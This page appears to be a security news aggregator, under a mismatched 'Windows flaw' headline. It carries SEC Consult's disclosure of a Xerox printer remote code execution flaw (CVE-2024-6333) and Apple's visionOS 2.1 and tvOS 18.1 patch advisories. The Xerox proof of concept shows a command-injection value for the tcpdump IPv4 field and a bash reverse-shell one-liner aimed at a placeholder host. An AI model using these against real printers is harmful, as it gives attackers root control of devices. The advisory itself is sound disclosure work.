Recurring Windows Flaw Could Expose User Credentials

Various Xerox printers, such as models EC80xx, AltaLink, VersaLink, and WorkCentre, suffer from an authenticated remote code execution vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20241023-0 >  
=======================================================================  
              title: Authenticated Remote Code Execution  
            product: Multiple Xerox printers  
                     (EC80xx, AltaLink, VersaLink, WorkCentre)  
 vulnerable version: see vulnerable versions below  
      fixed version: see solution section below  
         CVE number: CVE-2024-6333  
             impact: high  
           homepage: https://xerox.com  
              found: 2023-12-14  
                 by: Timo Longin (Office Vienna)  
                     Tamas Jos (Office Zurich)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are a global leader in office and production print technology and related  
solutions, with a large and growing presence in Digital and IT Services.  
Having redefined the workplace experience for more than 100 years, our  
differentiated business and technology offerings are empowering client success  
today by addressing the productivity challenges of a hybrid workplace and  
distributed workforce."

Source: https://investors.xerox.com/

Business recommendation:  
------------------------  
SEC Consult recommends Xerox customers to install the latest updates and review  
the vendor's security note for further information.

Also make sure to have patches from previous security notes installed, such as  
XRX23-020. SEC Consult has re-identified some critical 0-days (unauthenticated RCE,  
partial authentication bypass) that were already patched but not clearly  
communicated in the previous security notes.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
An attacker authenticated as a user with administrative access to the  
web interface of a range of affected Xerox printers can exploit a remote code  
execution vulnerability (RCE) as root user. It allows an attacker to execute  
commands directly on the operating system of the printer with root permissions.  
Consequently, the target Xerox printer can be fully compromised.

Proof of concept:  
-----------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
The "Network Troubleshooting" menu enables administrators to configure and run  
network troubleshooting based on the tcpdump tool. The web interface allows to  
apply custom filters like an IPv4 address as well as specific network services,  
as seen in the image (figure 1) below.

<img Network_Troubleshooting.png>

Due to insufficient input validation in the IPv4 address value, an attacker  
may inject further OS commands into the final tcpdump command string. For  
example, by setting the IPv4 address to the value "0.0.0.0$(bash $TMP~cmd)",  
commands stored under "/tmp/~cmd" get executed, when starting a network  
troubleshooting session.

Note: The payload in the IPv4 address must bypass a character filter,  
and was kept simple for demonstration purposes. Other payloads that directly  
execute commands without requiring the "/tmp/~cmd" file exist and can be  
crafted.

An attacker who, for example, has previously exploited the unauthenticated  
RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant  
the following commands for a reverse shell in to "/tmp/~cmd".

-------------------------------------------------------------------------------

bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1

-------------------------------------------------------------------------------

Since, the network troubleshooting service is running tcpdump with root  
permissions, full access to a range of Xerox printers can be obtained this way.  
See figure 2 below.

<img reverse_shell.png>

Vulnerable versions:  
-----------------------------  
The following products & versions have been tested initially, which were not  
patched to the latest version according to vendor. Hence our other identified  
critical security issues were removed from this advisory.  
* Xerox Workcentre 7970 (073.200.167.09610)  
* Xerox Workcentre 7855 (073.040.167.09610)

According to the vendor, the following products are affected:

* AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)  
* AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)  
* Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)  
* AltaLink®C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)  
* WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)  
* WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)  
* WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)  
* WorkCentre 7830/7835i (<075.010 004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)  
* WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)  
* WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)  
* WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)

Vendor contact timeline:  
------------------------  
2024-02-05: Contacting vendor through the Xerox Security Response Center (XSRC)  
            https://forms.business.xerox.com/en-us/xerox-security-response-center/  
2024-02-06: Xerox assigns case id XSRC-2024-0003  
2024-02-08: Xerox provides links for the current firmware versions to confirm  
            whether the issues can be reproduced.  
2024-02-27: Xerox asks for status update.  
2024-02-28: The authenticated RCE was confirmed to be exploitable in the current  
            firmware version (075.040.013.29000 and 075.200.013.29000).  
            Vulnerability one and two are fixed in the most recent versions.  
2024-03-19: Xerox requests more information on provided PoCs.  
2024-04-02: SEC Consult provides the requested information.  
2024-04-18: SEC Consult asks for updates on the vulnerability status.  
2024-05-06: Xerox provides an update/patch for the affected WorkCentre7890 and 7855  
            series.  
2024-05-16: SEC Consult asks about a CVE number for the authenticated RCE  
            vulnerability. Also SEC Consult inquires about for further plans on  
            confirming the affected models and versions that are potentially  
            affected by the partial authentication bypass and pre-authenticated RCE  
            vulnerabilities.  
2024-05-21: Xerox states that they are evaluating other models. Also, they request  
            a CVSS score and vector for the authenticated RCE. Furthermore, more  
            details on the public disclosure timeline are requested.  
2024-05-23: SEC Consult provides the requested information.  
2024-06-03: Status update from Xerox regarding CVE-ID request. Furthermore,  
            more information on the to be released advisory is requested.  
2024-06-06: Status update from Xerox regarding CVE-ID request.  
2024-06-10: Xerox again requests a CVSS score and vector for the authenticated RCE.  
2024-06-14: SEC Consult again provides the CVSS score and vector. Also, information  
            on the to be released advisory is provided.  
2024-06-25: Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability.  
2024-06-28: Informing Xerox about longer vacation period / absence.  
            Asking again about further affected models.  
2024-07-01: Xerox: Further models are affected, will be shared in the final publication.  
2024-07-16: Xerox asks for our publication draft.  
2024-07-31: Xerox asks again for our publication draft.  
2024-07-31: SEC Consult reminds Xerox about vacation, references our draft advisory  
            already sent a few months ago. Asking whether the other models are  
            affected by the authenticated RCE only, or by the other identified  
            vulnerabilities as well.  
2024-08-28: Xerox provides high-level summary of the case, but no details on affected  
            models.  
2024-10-03: SEC Consult provides an updated advisory with minor changes to Xerox,  
            again asking whether other versions and models are affected by the  
            described vulnerabilities.  
2024-10-07: Xerox provides further information on the partial authentication bypass  
            and pre-authenticated RCE vulnerabilities, showing that these have been  
            addressed in previous patches. Also, further coordination regarding  
            Xerox' Security Bulletin Release.  
2024-10-16: Release of Xerox Security Bulletin XRX24-015, covering the authenticated  
            RCE vulnerability.  
2024-10-21: Sending latest advisory draft to Xerox, setting release date to 23rd October.  
            Asking Xerox whether the security bulletin XRX23-020   
(https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf) is the correct one for the other issues and why there is no   
mention  
            regarding our pre-auth RCE there.  
            Xerox responds with the link to the latest XRX24-015 bulletin and that  
            our advisory is fine.  
2024-10-23: Coordinated release of advisory.

Solution:  
---------  
Xerox provided patches for the affected printers. More information can be found  
in Xerox' Security Bulletin XRX24-015:

https://securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Timo Longin, Tamas Jos / @2024

Xerox Printers Authenticated Remote Code Execution

Apple Security Advisory 10-28-2024-8 - visionOS 2.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-8 visionOS 2.1

visionOS 2.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121566.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: Apple Vision Pro  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

CoreMedia Playback  
Available for: Apple Vision Pro  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreText  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Foundation  
Available for: Apple Vision Pro  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple Vision Pro  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

IOSurface  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: Apple Vision Pro  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Lock Screen  
Available for: Apple Vision Pro  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44262: Justin Saboo

Managed Configuration  
Available for: Apple Vision Pro  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail Amzdak

MobileBackup  
Available for: Apple Vision Pro  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: A logic issue was addressed with improved file handling.  
CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill  
(@jjtech@infosec.exchange)

Pro Res  
Available for: Apple Vision Pro  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from Dawn  
Security Lab of JD.com, Inc.

Safari Downloads  
Available for: Apple Vision Pro  
Impact: An attacker may be able to misuse a trust relationship to  
download malicious content  
Description: This issue was addressed through improved state management.  
CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Safari Private Browsing  
Available for: Apple Vision Pro  
Impact: Private browsing may leak some browsing history  
Description: An information leakage was addressed with additional  
validation.  
CVE-2024-44229: Lucas Di Tomase

Shortcuts  
Available for: Apple Vision Pro  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

Siri  
Available for: Apple Vision Pro  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)

Siri  
Available for: Apple Vision Pro  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Additional recognition

Calendar  
We would like to acknowledge  K宝(@Pwnrin) for their assistance.

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

Messages  
We would like to acknowledge Collin Potter, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Safari Private Browsing  
We would like to acknowledge an anonymous researcher, r00tdaddy for  
their assistance.

Safari Tabs  
We would like to acknowledge Jaydev Ahire for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Instructions on how to update visionOS are available at  
https://support.apple.com/118481. To check the software version  
on your Apple Vision Pro, open the Settings app and choose General >  
About.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAfIACgkQX+5d1TXa  
IvpPzw/+OkUnfZKbUwCJy+p9jbg/ZO5i/RRbW4Tk3E6kDx0idc+p/MLRP+Guy3n+  
hJOBSf0cEcebnpu8HYJx4FnkTef0SYWfE2qhEES2Rs8kro5lA+Rr/o3yJjhE9tUN  
rWr3ZqGptThOsFiC7AxIieBlNGJAXI8J7PdtcIuN1anzF/decUf6mf9xO90nk1JH  
Feof4/Mxcks5tq6s2GGJu8jilt+Lm8rjXnrrix9Dw+fUTuz1+1Zd/hxX7M7YhCzb  
VdtLWXGHsmLNc+uxhb0krnI37x8lbfz8WrOYBaSTz3WjBvMhC9HEmFdyT9nl++nm  
HjzI5WE66YyOFufA+XwFpbroPGrSNM4k/ievpTX/39XzCLxVd1ocVHkKi8HZ2F13  
wB/7DKVj+inrXD/dVEHyW7e6dYiXrbgDOAfrkRgqv+aFYm/seuFIYxtHV8VdOrx8  
6gl27L2q4bMPIBicT6YGquyrog5qKfkD+VoiM2QPKaTt7MX70eJD7mywoFbD2cSk  
McS3pu+SPRhD0bpYx9Uy93w6w8AnBI0EtUUshF/+A7Z0bY4oAZKKsTeviqI1yYpw  
YHNSW7AO/Su/Y3mbJge4jENKjiUa8pk9am19Ks8JvMiHZhuGl1KG6GcK2pkLTZd1  
Lub2pxLg5uDPF1OkAG8IbVEi2OIXJZ8wSwphcmaKeQbcfGaVwCE=  
=l6xz  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-8

Apple Security Advisory 10-28-2024-7 - tvOS 18.1 addresses information leakage, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-7 tvOS 18.1

tvOS 18.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121569.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

App Support  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

CoreMedia Playback  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreText  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Foundation  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

IOSurface  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Managed Configuration  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44258: Hichem Maloufi, Christian Mina, Ismail Amzdak

MobileBackup  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Restoring a maliciously crafted backup file may lead to  
modification of protected system files  
Description: A logic issue was addressed with improved file handling.  
CVE-2024-44252: Nimrat Khalsa, Davis Dai, James Gill  
(@jjtech@infosec.exchange)

Pro Res  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from Dawn  
Security Lab of JD.com, Inc.

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

Additional recognition

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting  
"Settings -> System -> Software Update -> Update Software."

To check the current version of software, select  
"Settings -> General → About.“

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcgAScACgkQX+5d1TXa  
IvpzYBAAoCN0SuujtunAgU1eUmXrdnRze4Jf5Wwz23Qra51OgKehUlK2n1DuToJM  
Gs3Bw6inMGX+kizS4vhInhoJ7Z4kArROvKooV6qBtJw5lq7Imxr3E7305dWU230s  
HRjaMamEE3llDflvOo5fiKiKBYihuH+qOZ/jrdzdPSaw4zpw5gDA6za5pfAnW58U  
2tzwM0zSkAXiAIBrzYlNVcmL7EYdLgullxsSK6KI26qWRAWsN9u5PljzfCBOr1vo  
5geJY3EFSjdcrWm1s3AKYCPJQgiL3UwcGFIQqyKsrtwRaFUuM0l/nOIdvP8SW2BY  
8wC06REVN2yV29qECsBhtaqXwybBDdwZiBaJ7BaAnHTZzrd0Vc00LC2UgMhT+Qb8  
9EtcgsrImVqVKFXsdYvQlqxuWGYJRjkpMuWF2aCtqgjPvUfipzB0HDMhqgFpzeet  
EIMFYEV+IqoNYg6AfrsBA+ok4IHaVSyTWHB0k5rQM0YVaVF6MHqZYhKj/lbiHax9  
sJbEaDkiFF+xHSKc3LnoG+KTlXboHaaNDyD4/uyEsrcS1S9y4Ni+WnZi2ufluItW  
Wl7aRYr+UMR6qc7zWL2mY5cafT/hfNVu6tUbfIWyN5LE9imT27IIVZfzsQ299PCF  
Kmi61d0fwS9AuJrxic1TnMbNEGS2g0NLcmTEMeIWFatzhpurglA=  
=zC9Y  
-----END PGP SIGNATURE-----

Tag

#zero_day